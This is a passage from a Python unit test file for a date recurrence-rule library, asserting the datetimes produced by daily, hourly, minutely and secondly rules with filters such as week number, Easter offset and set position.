dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 2, 3, 9, 0),
datetime(1998, 3, 3, 9, 0)])
def testDailyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 3, 3, 9, 0),
datetime(2001, 3, 1, 9, 0)])
def testDailyByYearDay(self):
self.assertEqual(list(rrule(DAILY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testDailyByYearDayNeg(self):
self.assertEqual(list(rrule(DAILY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 9, 0),
datetime(1998, 1, 1, 9, 0),
datetime(1998, 4, 10, 9, 0),
datetime(1998, 7, 19, 9, 0)])
def testDailyByMonthAndYearDay(self):
self.assertEqual(list(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testDailyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(DAILY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 9, 0),
datetime(1998, 7, 19, 9, 0),
datetime(1999, 1, 1, 9, 0),
datetime(1999, 7, 19, 9, 0)])
def testDailyByWeekNo(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 9, 0),
datetime(1998, 5, 12, 9, 0),
datetime(1998, 5, 13, 9, 0)])
def testDailyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may fall in the previous year.
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 9, 0),
datetime(1999, 1, 4, 9, 0),
datetime(2000, 1, 3, 9, 0)])
def testDailyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1998, 12, 27, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testDailyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 9, 0),
datetime(1999, 1, 3, 9, 0),
datetime(2000, 1, 2, 9, 0)])
def testDailyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 9, 0),
datetime(2004, 12, 27, 9, 0),
datetime(2009, 12, 28, 9, 0)])
def testDailyByEaster(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 9, 0),
datetime(1999, 4, 4, 9, 0),
datetime(2000, 4, 23, 9, 0)])
def testDailyByEasterPos(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 9, 0),
datetime(1999, 4, 5, 9, 0),
datetime(2000, 4, 24, 9, 0)])
def testDailyByEasterNeg(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 9, 0),
datetime(1999, 4, 3, 9, 0),
datetime(2000, 4, 22, 9, 0)])
def testDailyByHour(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 3, 6, 0),
datetime(1997, 9, 3, 18, 0)])
def testDailyByMinute(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 3, 9, 6)])
def testDailyBySecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 3, 9, 0, 6)])
def testDailyByHourAndMinute(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 3, 6, 6)])
def testDailyByHourAndSecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 3, 6, 0, 6)])
def testDailyByMinuteAndSecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testDailyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testDailyBySetPos(self):
self.assertEqual(list(rrule(DAILY,
count=3,
byhour=(6, 18),
byminute=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 15),
datetime(1997, 9, 3, 6, 45),
datetime(1997, 9, 3, 18, 15)])
def testHourly(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 10, 0),
datetime(1997, 9, 2, 11, 0)])
def testHourlyInterval(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 11, 0),
datetime(1997, 9, 2, 13, 0)])
def testHourlyIntervalLarge(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
interval=769,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 10, 4, 10, 0),
datetime(1997, 11, 5, 11, 0)])
def testHourlyByMonth(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 0, 0),
datetime(1997, 9, 3, 1, 0),
datetime(1997, 9, 3, 2, 0)])
def testHourlyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 0, 0),
datetime(1998, 1, 5, 1, 0),
datetime(1998, 1, 5, 2, 0)])
def testHourlyByWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 10, 0),
datetime(1997, 9, 2, 11, 0)])
def testHourlyByNWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 10, 0),
datetime(1997, 9, 2, 11, 0)])
def testHourlyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 1, 0),
datetime(1998, 1, 1, 2, 0)])
def testHourlyByYearDay(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 1, 0),
datetime(1997, 12, 31, 2, 0),
datetime(1997, 12, 31, 3, 0)])
def testHourlyByYearDayNeg(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 1, 0),
datetime(1997, 12, 31, 2, 0),
datetime(1997, 12, 31, 3, 0)])
def testHourlyByMonthAndYearDay(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 1, 0),
datetime(1998, 4, 10, 2, 0),
datetime(1998, 4, 10, 3, 0)])
def testHourlyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 1, 0),
datetime(1998, 4, 10, 2, 0),
datetime(1998, 4, 10, 3, 0)])
def testHourlyByWeekNo(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 0, 0),
datetime(1998, 5, 11, 1, 0),
datetime(1998, 5, 11, 2, 0)])
def testHourlyByWeekNoAndWeekDay(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 0, 0),
datetime(1997, 12, 29, 1, 0),
datetime(1997, 12, 29, 2, 0)])
def testHourlyByWeekNoAndWeekDayLarge(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 1, 0),
datetime(1997, 12, 28, 2, 0)])
def testHourlyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 1, 0),
datetime(1997, 12, 28, 2, 0)])
def testHourlyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 0, 0),
datetime(1998, 12, 28, 1, 0),
datetime(1998, 12, 28, 2, 0)])
def testHourlyByEaster(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 0, 0),
datetime(1998, 4, 12, 1, 0),
datetime(1998, 4, 12, 2, 0)])
def testHourlyByEasterPos(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 0, 0),
datetime(1998, 4, 13, 1, 0),
datetime(1998, 4, 13, 2, 0)])
def testHourlyByEasterNeg(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 0, 0),
datetime(1998, 4, 11, 1, 0),
datetime(1998, 4, 11, 2, 0)])
def testHourlyByHour(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 3, 6, 0),
datetime(1997, 9, 3, 18, 0)])
def testHourlyByMinute(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 2, 10, 6)])
def testHourlyBySecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 2, 10, 0, 6)])
def testHourlyByHourAndMinute(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 3, 6, 6)])
def testHourlyByHourAndSecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 3, 6, 0, 6)])
def testHourlyByMinuteAndSecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testHourlyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testHourlyBySetPos(self):
self.assertEqual(list(rrule(HOURLY,
count=3,
byminute=(15, 45),
bysecond=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 15, 45),
datetime(1997, 9, 2, 9, 45, 15),
datetime(1997, 9, 2, 10, 15, 45)])
def testMinutely(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 1),
datetime(1997, 9, 2, 9, 2)])
def testMinutelyInterval(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 2),
datetime(1997, 9, 2, 9, 4)])
def testMinutelyIntervalLarge(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
interval=1501,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 10, 1),
datetime(1997, 9, 4, 11, 2)])
def testMinutelyByMonth(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 0, 0),
datetime(1997, 9, 3, 0, 1),
datetime(1997, 9, 3, 0, 2)])
def testMinutelyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 0, 0),
datetime(1998, 1, 5, 0, 1),
datetime(1998, 1, 5, 0, 2)])
def testMinutelyByWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 1),
datetime(1997, 9, 2, 9, 2)])
def testMinutelyByNWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 2, 9, 1),
datetime(1997, 9, 2, 9, 2)])
def testMinutelyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByMonthAndMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0),
datetime(1998, 1, 1, 0, 1),
datetime(1998, 1, 1, 0, 2)])
def testMinutelyByYearDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 0, 1),
datetime(1997, 12, 31, 0, 2),
datetime(1997, 12, 31, 0, 3)])
def testMinutelyByYearDayNeg(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 31, 0, 0),
datetime(1997, 12, 31, 0, 1),
datetime(1997, 12, 31, 0, 2),
datetime(1997, 12, 31, 0, 3)])
def testMinutelyByMonthAndYearDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 0, 1),
datetime(1998, 4, 10, 0, 2),
datetime(1998, 4, 10, 0, 3)])
def testMinutelyByMonthAndYearDayNeg(self):
self.assertEqual(list(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 10, 0, 0),
datetime(1998, 4, 10, 0, 1),
datetime(1998, 4, 10, 0, 2),
datetime(1998, 4, 10, 0, 3)])
def testMinutelyByWeekNo(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 5, 11, 0, 0),
datetime(1998, 5, 11, 0, 1),
datetime(1998, 5, 11, 0, 2)])
def testMinutelyByWeekNoAndWeekDay(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 29, 0, 0),
datetime(1997, 12, 29, 0, 1),
datetime(1997, 12, 29, 0, 2)])
def testMinutelyByWeekNoAndWeekDayLarge(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 0, 1),
datetime(1997, 12, 28, 0, 2)])
def testMinutelyByWeekNoAndWeekDayLast(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 12, 28, 0, 0),
datetime(1997, 12, 28, 0, 1),
datetime(1997, 12, 28, 0, 2)])
def testMinutelyByWeekNoAndWeekDay53(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 12, 28, 0, 0),
datetime(1998, 12, 28, 0, 1),
datetime(1998, 12, 28, 0, 2)])
def testMinutelyByEaster(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 12, 0, 0),
datetime(1998, 4, 12, 0, 1),
datetime(1998, 4, 12, 0, 2)])
def testMinutelyByEasterPos(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 13, 0, 0),
datetime(1998, 4, 13, 0, 1),
datetime(1998, 4, 13, 0, 2)])
def testMinutelyByEasterNeg(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 4, 11, 0, 0),
datetime(1998, 4, 11, 0, 1),
datetime(1998, 4, 11, 0, 2)])
def testMinutelyByHour(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0),
datetime(1997, 9, 2, 18, 1),
datetime(1997, 9, 2, 18, 2)])
def testMinutelyByMinute(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6),
datetime(1997, 9, 2, 9, 18),
datetime(1997, 9, 2, 10, 6)])
def testMinutelyBySecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 6),
datetime(1997, 9, 2, 9, 0, 18),
datetime(1997, 9, 2, 9, 1, 6)])
def testMinutelyByHourAndMinute(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6),
datetime(1997, 9, 2, 18, 18),
datetime(1997, 9, 3, 6, 6)])
def testMinutelyByHourAndSecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 0, 6),
datetime(1997, 9, 2, 18, 0, 18),
datetime(1997, 9, 2, 18, 1, 6)])
def testMinutelyByMinuteAndSecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 6, 6),
datetime(1997, 9, 2, 9, 6, 18),
datetime(1997, 9, 2, 9, 18, 6)])
def testMinutelyByHourAndMinuteAndSecond(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 18, 6, 6),
datetime(1997, 9, 2, 18, 6, 18),
datetime(1997, 9, 2, 18, 18, 6)])
def testMinutelyBySetPos(self):
self.assertEqual(list(rrule(MINUTELY,
count=3,
bysecond=(15, 30, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 15),
datetime(1997, 9, 2, 9, 0, 45),
datetime(1997, 9, 2, 9, 1, 15)])
def testSecondly(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 1),
datetime(1997, 9, 2, 9, 0, 2)])
def testSecondlyInterval(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 2),
datetime(1997, 9, 2, 9, 0, 4)])
def testSecondlyIntervalLarge(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
interval=90061,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 3, 10, 1, 1),
datetime(1997, 9, 4, 11, 2, 2)])
def testSecondlyByMonth(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 3, 0, 0, 0),
datetime(1997, 9, 3, 0, 0, 1),
datetime(1997, 9, 3, 0, 0, 2)])
def testSecondlyByMonthAndMonthDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 5, 0, 0, 0),
datetime(1998, 1, 5, 0, 0, 1),
datetime(1998, 1, 5, 0, 0, 2)])
def testSecondlyByWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 1),
datetime(1997, 9, 2, 9, 0, 2)])
def testSecondlyByNWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0, 0),
datetime(1997, 9, 2, 9, 0, 1),
datetime(1997, 9, 2, 9, 0, 2)])
def testSecondlyByMonthAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthAndNWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1998, 1, 1, 0, 0, 0),
datetime(1998, 1, 1, 0, 0, 1),
datetime(1998, 1, 1, 0, 0, 2)])
def testSecondlyByMonthDayAndWeekDay(self):
self.assertEqual(list(rrule(SECONDLY,
count=3,
